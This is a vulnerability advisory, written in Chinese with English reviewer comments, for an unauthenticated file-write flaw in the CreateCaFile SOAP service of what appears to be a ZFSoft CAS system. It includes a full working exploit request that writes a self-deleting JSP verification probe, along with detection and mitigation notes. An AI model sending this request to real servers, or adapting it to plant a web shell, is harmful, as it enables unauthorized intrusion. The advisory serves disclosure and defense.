漏洞描述
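文件写入漏洞是指攻击者通过某种方式向服务器写入恶意文件，从而可能导致服务器被控制、数据被篡改或删除、服务中断等严重后果。这类漏洞通常是由于应用程序没有对用户输入的文件名、路径或内容进行严格的验证和过滤，或者对文件写入、上传功能的权限控制不够严格，使得攻击者能够上传恶意脚本或修改服务器上的文件。下面的请求即为一例：`/zfca/axis/CreateCaFile` 的 `createFile` 操作从 SOAP 请求体中接收 `filepath`（文件名）和 `content`（文件内容）两个参数，而请求中指定的文件名以 `.jsp` 结尾。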
POST /zfca/axis/CreateCaFile HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 885
Content-Type: text/xml;charset=UTF-8
Soapaction: ""
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.732.74 Safari/537.36
<!--
  Reviewer annotations: the comments in this listing are not part of the original
  request body, so the Content-Length header above refers to the unannotated body.

  SOAP 1.1 envelope that invokes the createFile operation (prefix "pub") with two
  client-supplied string parameters: filepath and content.
  NOTE(review): the request headers shown carry no Cookie or Authorization header,
  so the endpoint is presumably reachable without authentication. Confirm this
  against the affected deployment.
-->
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:pub="http://pubService.webServices.zfca.zfsoft.com">
<soapenv:Header/>
<soapenv:Body>
<pub:createFile soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<!--
  filepath: the file name is chosen entirely by the client and here ends in .jsp,
  a type the servlet container would execute if it lands under the web root.
  Server-side check to look for: reject path separators and ".." sequences, allow
  only expected extensions, and write to a directory that is not served or executed.
-->
<filepath xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">159357777.jsp</filepath>
<!--
  content: the CDATA section carries a short JSP scriptlet as plain text. When
  requested, it prints a Base64-decoded constant (the constant decodes to a
  32-character hexadecimal string, which looks like a fixed marker) and then deletes
  the file at the real path of the current servlet path, i.e. the JSP itself. It
  therefore reads as a self-removing verification probe, not a persistent payload.
  Detection: log and alert on POSTs to this path whose filepath value ends in
  .jsp or .jspx, and on script files appearing in the web application directory.
-->
<content xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<![CDATA[
<%
out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));
new java.io.File(application.getRealPath(request.getServletPath())).delete();
%>
]]>
</content>
</pub:createFile>
</soapenv:Body>
</soapenv:Envelope>